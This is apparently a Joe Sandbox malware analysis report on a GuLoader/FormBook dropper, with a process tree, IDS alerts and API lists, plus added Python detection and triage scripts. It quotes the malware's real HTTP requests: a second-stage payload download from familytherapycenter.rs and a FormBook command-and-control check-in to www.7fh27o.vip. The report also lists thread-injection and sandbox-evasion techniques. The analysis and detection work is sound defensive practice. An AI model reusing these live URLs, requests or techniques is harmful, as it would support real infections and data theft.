
Windows Analysis Report
Anfrage.exe

Overview

General Information

Sample name: Anfrage.exe
Analysis ID: 1553562
MD5: 71ea800a6b7644be75507e3b74e3cce2
SHA1: aa1ac653b8d942a98770538d3e1fb325491cab45
SHA256: e81a266ca8fee88c3eee94cea7494225e905354c9e31635683467fbfe7844d91
Tags: exe, user-adrian__luca

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Anfrage.exe (PID: 7368 cmdline: "C:\Users\user\Desktop\Anfrage.exe" MD5: 71EA800A6B7644BE75507E3B74E3CCE2)
    • Anfrage.exe (PID: 8048 cmdline: "C:\Users\user\Desktop\Anfrage.exe" MD5: 71EA800A6B7644BE75507E3B74E3CCE2)
      • mrdYGoZBmXi.exe (PID: 5252 cmdline: "C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ktmutil.exe (PID: 3532 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
          • mrdYGoZBmXi.exe (PID: 2220 cmdline: "C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
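
The tree above is the whole infection chain in five processes: the NSIS-packaged GuLoader stage (Anfrage.exe) re-launches itself with an identical command line, the second instance writes and starts mrdYGoZBmXi.exe from a Program Files (x86) directory with a machine-generated name, that dropper starts the Windows system binary ktmutil.exe from SysWOW64 (the process the report's later injection signatures fire on), and ktmutil.exe in turn starts the dropper image again. The Python below is an added example, not Joe Sandbox code: it encodes those three links as rules over Sysmon-style process-creation events. The events are transcribed from the tree; the explorer.exe root (PID 1234) and the notepad.exe control case (PID 4444) are made up so that a benign parent and a benign system binary are present.

```python
"""Added example (not Joe Sandbox code): flag the process chain shown in the
report's process tree in Sysmon-style process-creation events."""
from dataclasses import dataclass
import re


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events transcribed from the report's process tree. The explorer.exe
# root (PID 1234) and the notepad.exe control event (PID 4444) are made up.
DROPPER = (r"C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM"
           r"\mrdYGoZBmXi.exe")
EVENTS = [
    ProcEvent(1234, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(7368, 1234, r"C:\Users\user\Desktop\Anfrage.exe", r'"C:\Users\user\Desktop\Anfrage.exe"'),
    ProcEvent(8048, 7368, r"C:\Users\user\Desktop\Anfrage.exe", r'"C:\Users\user\Desktop\Anfrage.exe"'),
    ProcEvent(5252, 8048, DROPPER, f'"{DROPPER}"'),
    ProcEvent(3532, 5252, r"C:\Windows\SysWOW64\ktmutil.exe", r'"C:\Windows\SysWOW64\ktmutil.exe"'),
    ProcEvent(2220, 3532, DROPPER, f'"{DROPPER}"'),
    ProcEvent(4444, 1234, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
RANDOM_DIR = re.compile(r"[A-Za-z]{32,}")  # heuristic: one long, all-letter path component


def is_system_binary(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def under_windows(path: str) -> bool:
    return path.lower().startswith("c:\\windows\\")


def in_random_dir(path: str) -> bool:
    # Look at the directory components only (drop the drive and the file name).
    return any(RANDOM_DIR.fullmatch(part) for part in path.split("\\")[1:-1])


def detect(events):
    """Return (pid, rule) findings for the three links in the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        # 1. A process re-launching itself with an identical command line
        #    (Anfrage.exe -> Anfrage.exe). Weak on its own: installers and
        #    browsers do this too, so it only corroborates the rules below.
        if e.image.lower() == parent.image.lower() and e.cmdline == parent.cmdline:
            findings.append((e.pid, "self_reexec"))
        # 2. A binary from System32/SysWOW64 started by a parent outside
        #    C:\Windows (mrdYGoZBmXi.exe -> ktmutil.exe), with an extra mark
        #    when that parent lives in a directory whose name looks generated.
        if is_system_binary(e.image) and not under_windows(parent.image):
            findings.append((e.pid, "lolbin_from_user_parent"))
            if in_random_dir(parent.image):
                findings.append((e.pid, "parent_in_random_dir"))
        # 3. That system binary spawning its own parent's image again
        #    (ktmutil.exe -> mrdYGoZBmXi.exe): the injected-into host handing
        #    control back to the dropper.
        grand = by_pid.get(parent.ppid)
        if grand is not None and is_system_binary(parent.image) and e.image.lower() == grand.image.lower():
            findings.append((e.pid, "respawn_via_lolbin"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"PID {pid}: {rule}")
```

Rule 2 is the one worth alerting on by itself: a system binary whose parent is not under C:\Windows is rare on workstations, and the report shows exactly why it matters (the APC queueing, section mapping and suspended-process creation all target that ktmutil.exe). Rules 1 and 3 are corroboration; the notepad.exe control event produces no finding because its parent is explorer.exe.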
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.2511601246.00000000370E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2646659218.0000000002E10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.2476059980.00000000000B0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.2647873308.00000000023D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(4 further Yara entries not expanded in this export)
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-11T12:03:35.896385+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.8 | 49705 | TCP
2024-11-11T12:04:13.973164+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.8 | 49711 | TCP
2024-11-11T12:05:16.864867+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49716 | 3.33.130.190 | 80 | TCP
2024-11-11T12:04:37.711666+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49713 | 188.40.95.144 | 443 | TCP
2024-11-11T12:05:16.864867+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 3.33.130.190 | 80 | TCP


            AV Detection

Source: Anfrage.exe | Avira: detected
Source: Anfrage.exe | ReversingLabs: Detection: 52%
Source: Yara match | File source: 00000007.00000002.2511601246.00000000370E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2646659218.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2476059980.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2647873308.00000000023D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2646605622.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Anfrage.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: Anfrage.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: mshtml.pdb source: Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mrdYGoZBmXi.exe, 00000008.00000000.2402775106.0000000000EDE000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: wntdll.pdbUGP source: Anfrage.exe, 00000007.00000003.2390764590.00000000361DC000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2388742992.0000000036024000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Anfrage.exe, Anfrage.exe, 00000007.00000003.2390764590.00000000361DC000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2388742992.0000000036024000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdbGCTL source: Anfrage.exe, 00000007.00000002.2484828472.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484828472.00000000062B9000.00000004.00000020.00020000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000002.2646658528.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdb source: Anfrage.exe, 00000007.00000002.2484828472.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484828472.00000000062B9000.00000004.00000020.00020000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000002.2646658528.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 0_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 0_2_0040270B FindFirstFileA
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 0_2_004060C7 FindFirstFileA,FindClose
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028C9EA0: 4x nop then xor eax, eax

            Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49716 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49716 -> 3.33.130.190:80
Source: Joe Sandbox View | IP Address: 188.40.95.144
Source: Joe Sandbox View | IP Address: 3.33.130.190
Source: Joe Sandbox View | ASN Name: AMAZONEXPANSIONGB
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49713 -> 188.40.95.144:443
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.8:49711
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:49705
Source: global traffic | HTTP traffic detected:
    GET /JWXOdIrgRlshLWuPJxOk219.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: familytherapycenter.rs
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /wevl/?adSdg=uTwLyznpTHNh&LHxDf=lbf7j9XjlAZpd6A3UpNyt3NI6+34CVhmT1tEP0o3aWJOYRwplTIV2PpchU+8eNrfAMA1Qr8MjrKSknsxLVAK3zAHSnA/F7MUkgRRnoRlRVKgbnrUxpjP+0evIyvFm5JEhA== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.7fh27o.vip
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; LGL39C Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: familytherapycenter.rs
Source: global traffic | DNS traffic detected: DNS query: www.7fh27o.vip
Source: Anfrage.exe, Anfrage.exe, 00000000.00000000.1402818143.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000007.00000000.2118674317.000000000040A000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Anfrage.exe, 00000000.00000000.1402818143.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000007.00000000.2118674317.000000000040A000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Anfrage.exe, 00000007.00000001.2121368668.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Anfrage.exe, 00000007.00000001.2121368668.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: Anfrage.exe, 00000007.00000002.2484575388.0000000006285000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://familytherapycenter.rs/
Source: Anfrage.exe, 00000007.00000002.2484575388.0000000006285000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484575388.0000000006248000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.bin
Source: Anfrage.exe, 00000007.00000003.2389055505.0000000006298000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484828472.000000000629A000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2389278844.0000000006298000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binI
Source: Anfrage.exe, 00000007.00000002.2484575388.0000000006248000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binLeg
Source: Anfrage.exe, 00000007.00000002.2484575388.0000000006285000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binM
Source: Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | HTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
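
The alert table and the two HTTP requests above are what an analyst turns into indicators, and direction matters when doing so. In both 2022930 alerts the sandbox host 192.168.2.8 is the destination and the remote server on port 443 is the source, so the signature fired on data the host received, not on a connection the malware opened; the FormBook check-in to 3.33.130.190:80 and the payload fetch from 188.40.95.144:443 (familytherapycenter.rs) are the outbound ones. The request to www.7fh27o.vip also carries an Android user agent from a Windows 10 host, which is a cheap inconsistency to check for. The Python below is an added example, not part of the report: the alert rows and request lines are transcribed from the report, the "formbook-like URI" rule describes only the shape of the check-in shown above (one short directory, two opaque query keys, a long base64-looking second value) and is not a general FormBook signature, and the host OS is assumed to be Windows, as the report's w10x64 system indicates.

```python
"""Added example (not part of the Joe Sandbox report): triage the report's
Suricata alerts by direction and inspect the two HTTP requests."""
import re
from urllib.parse import urlsplit

SANDBOX_HOST = "192.168.2.8"  # the analysed machine, as shown in the report

# Alert rows transcribed from the report:
# (timestamp, sid, severity, message, src, sport, dst, dport)
ALERTS = [
    ("2024-11-11T12:03:35.896385+0100", 2022930, 1,
     "ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow",
     "4.175.87.197", 443, "192.168.2.8", 49705),
    ("2024-11-11T12:04:13.973164+0100", 2022930, 1,
     "ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow",
     "20.12.23.50", 443, "192.168.2.8", 49711),
    ("2024-11-11T12:04:37.711666+0100", 2803270, 2,
     "ETPRO MALWARE Common Downloader Header Pattern UHCa",
     "192.168.2.8", 49713, "188.40.95.144", 443),
    ("2024-11-11T12:05:16.864867+0100", 2050745, 1,
     "ET MALWARE FormBook CnC Checkin (GET) M5",
     "192.168.2.8", 49716, "3.33.130.190", 80),
    ("2024-11-11T12:05:16.864867+0100", 2855465, 1,
     "ETPRO MALWARE FormBook CnC Checkin (GET) M2",
     "192.168.2.8", 49716, "3.33.130.190", 80),
]

# The two requests from the report, re-joined as raw HTTP/1.1 header blocks.
REQUESTS = [
    "GET /JWXOdIrgRlshLWuPJxOk219.bin HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0\r\n"
    "Host: familytherapycenter.rs\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /wevl/?adSdg=uTwLyznpTHNh&LHxDf=lbf7j9XjlAZpd6A3UpNyt3NI6+34CVhmT1tEP0o3aWJOYRwplTIV2PpchU"
    "+8eNrfAMA1Qr8MjrKSknsxLVAK3zAHSnA/F7MUkgRRnoRlRVKgbnrUxpjP+0evIyvFm5JEhA== HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "Host: www.7fh27o.vip\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; LGL39C Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36\r\n\r\n",
]

B64ISH = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
OTHER_OS = ("Android", "iPhone", "iPad", "Linux")


def triage_alerts(alerts, host=SANDBOX_HOST):
    """Split alerts into connections the host opened and traffic it received.
    Only outbound MALWARE-class alerts become (peer, port) IOCs; an inbound
    alert with a remote source on 443 fired on a server response and needs a
    second look before its source is treated as attacker infrastructure."""
    outbound, inbound = [], []
    for ts, sid, sev, msg, src, sport, dst, dport in alerts:
        rec = {"ts": ts, "sid": sid, "severity": sev, "msg": msg}
        if src == host:
            rec.update(peer=dst, port=dport)
            outbound.append(rec)
        else:
            rec.update(peer=src, port=sport)
            inbound.append(rec)
    iocs = sorted({(r["peer"], r["port"]) for r in outbound if "MALWARE" in r["msg"]})
    return outbound, inbound, iocs


def parse_request(raw):
    """Minimal HTTP/1.1 request-header parser: (method, target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def inspect_request(raw, host_os="Windows"):
    """Return (Host header, flags) for one request sent by a host running host_os."""
    _method, target, headers = parse_request(raw)
    ua = headers.get("user-agent", "")
    flags = []
    # 1. The user agent claims a platform the sending host is not.
    if host_os == "Windows" and any(tag in ua for tag in OTHER_OS):
        flags.append("ua_platform_mismatch")
    # 2. Shape of the check-in above: one short directory, two opaque query keys,
    #    the second value a long base64-looking blob. The query is split by hand
    #    so that '+' and '/' inside the blob are kept as-is.
    parts = urlsplit(target)
    params = [p.split("=", 1) for p in parts.query.split("&") if "=" in p]
    if (re.fullmatch(r"/[a-z0-9]{2,8}/", parts.path) and len(params) == 2
            and B64ISH.fullmatch(params[1][1])):
        flags.append("formbook_like_checkin_uri")
    # 3. Second-stage fetch: a .bin object requested with Cache-Control: no-cache.
    if parts.path.endswith(".bin") and headers.get("cache-control") == "no-cache":
        flags.append("bin_download")
    return headers.get("host", ""), flags


if __name__ == "__main__":
    outbound, inbound, iocs = triage_alerts(ALERTS)
    print("outbound alerts:", [a["sid"] for a in outbound])
    print("inbound alerts (review before blocking):", [(a["sid"], a["peer"]) for a in inbound])
    print("C2/download IOCs:", iocs)
    for req in REQUESTS:
        print(inspect_request(req))
```

The split between inbound and outbound is the part to keep: blocking the sources of the two 2022930 alerts would block whatever servers answered the host on 443, which the report does not tie to the malware, while the two outbound IOCs are backed by the FormBook check-in signatures and the download of JWXOdIrgRlshLWuPJxOk219.bin that the memory strings also reference.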

            E-Banking Fraud

Source: Yara match | File source: 00000007.00000002.2511601246.00000000370E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2646659218.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2476059980.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2647873308.00000000023D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2646605622.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Anfrage.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_364035C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36403010 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36403090 NtSetValueKey
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36403D70 NtOpenThread
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36403D10 NtOpenProcessToken
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_364039B0 NtGetContextThread
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36404650 NtSuspendThread
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36404340 NtSetContextThread
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402E30 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402EE0 NtQueueApcThread
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402E80 NtReadVirtualMemory
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402EA0 NtAdjustPrivilegesToken
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402F60 NtCreateProcessEx
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402F30 NtCreateSection
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402FE0 NtCreateFile
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402F90 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402FA0 NtQuerySection
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402FB0 NtResumeThread
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402C60 NtCreateKey
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402C00 NtQueryInformationProcess
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402CC0 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402CF0 NtOpenProcess
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402CA0 NtQueryInformationToken
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402D00 NtSetInformationFile
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402D10 NtMapViewOfSection
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402D30 NtUnmapViewOfSection
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402DD0 NtDelayExecution
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402DF0 NtQuerySystemInformation
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402DB0 NtEnumerateKey
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402AD0 NtReadFile
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402AF0 NtWriteFile
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402AB0 NtWaitForSingleObject
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402B60 NtClose
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402BE0 NtQueryValueKey
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402BF0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402B80 NtQueryInformationFile
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36402BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03374340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03374650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372B60 NtClose,LdrInitializeThunk
